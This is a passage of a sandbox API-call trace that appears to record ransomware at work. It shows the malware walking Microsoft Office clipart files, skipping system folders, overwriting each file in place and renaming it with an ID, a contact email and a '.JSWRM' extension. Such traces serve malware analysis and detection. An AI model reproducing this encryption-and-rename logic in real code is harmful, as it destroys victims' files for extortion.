lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.423] CloseHandle (hObject=0x314) returned 1 [0094.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0094.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0094.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0094.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0094.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0094.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0094.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0094.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0094.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0094.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0094.424] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02503u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02503U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02503u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0094.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0094.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0094.425] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8499, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02567J.JPG", cAlternateFileName="")) returned 1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2=".") returned 1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="..") returned 1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="...") returned 1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="windows") returned -1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="recovery") returned -1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="perflogs") returned 1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="documents and settings") returned 1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="$RECYCLE.BIN") returned 1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="system volume information") returned -1 [0094.425] lstrcmpiW (lpString1="PH02567J.JPG", lpString2="msocache") returned 1 [0094.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0094.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02567J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02567J.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02567J.JPG", lpUsedDefaultChar=0x0) returned 12 [0094.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0094.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0094.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02567J.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02567J.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02567J.JPG", lpUsedDefaultChar=0x0) returned 12 [0094.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0094.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0094.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0094.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0094.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02567j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.426] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33945) returned 1 [0094.426] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8490) returned 0x24d210 [0094.427] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8490, lpOverlapped=0x0) returned 1 [0094.430] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.431] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8490, lpOverlapped=0x0) returned 1 [0094.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.431] CloseHandle (hObject=0x314) returned 1 [0094.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0094.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0094.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0094.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0094.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0094.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0094.432] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.432] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02567j.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02567J.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02567j.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0094.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0094.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0094.433] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1025500d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x639b, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02736G.GIF", cAlternateFileName="")) returned 1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2=".") returned 1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="..") returned 1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="...") returned 1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="windows") returned -1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="recovery") returned -1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="perflogs") returned 1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="documents and settings") returned 1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="system volume information") returned -1 [0094.433] lstrcmpiW (lpString1="PH02736G.GIF", lpString2="msocache") returned 1 [0094.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0094.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02736G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02736G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02736G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0094.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0094.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02736G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02736G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02736G.GIF", lpUsedDefaultChar=0x0) returned 12 [0094.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0094.433] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0094.433] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0094.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.433] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0094.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.434] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25499) returned 1 [0094.434] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.434] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6390) returned 0x24d210 [0094.435] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6390, lpOverlapped=0x0) returned 1 [0094.461] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.461] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6390, lpOverlapped=0x0) returned 1 [0094.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.461] CloseHandle (hObject=0x314) returned 1 [0094.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0094.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0094.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0094.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0094.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0094.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0094.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0094.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0094.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0094.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0094.462] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0094.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0094.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0094.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0094.463] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH02736U.BMP", cAlternateFileName="")) returned 1 [0094.463] lstrcmpiW (lpString1="PH02736U.BMP", lpString2=".") returned 1 [0094.463] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="..") returned 1 [0094.463] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="...") returned 1 [0094.463] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="windows") returned -1 [0094.463] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="recovery") returned -1 [0094.463] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="perflogs") returned 1 [0094.463] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="documents and settings") returned 1 [0094.463] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0094.464] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="system volume information") returned -1 [0094.464] lstrcmpiW (lpString1="PH02736U.BMP", lpString2="msocache") returned 1 [0094.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0094.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02736U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02736U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02736U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0094.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0094.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02736U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH02736U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH02736U.BMP", lpUsedDefaultChar=0x0) returned 12 [0094.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0094.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0094.464] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0094.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0094.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0094.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0094.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0094.465] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32400) returned 1 [0094.465] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e90) returned 0x24d210 [0094.465] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7e90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7e90, lpOverlapped=0x0) returned 1 [0094.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.470] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7e90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7e90, lpOverlapped=0x0) returned 1 [0094.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0094.471] CloseHandle (hObject=0x314) returned 1 [0094.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0094.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0094.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0094.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0094.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0094.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0094.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0094.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0094.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0094.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0094.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0094.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0094.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0094.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0094.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02736U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02736u.bmp"), 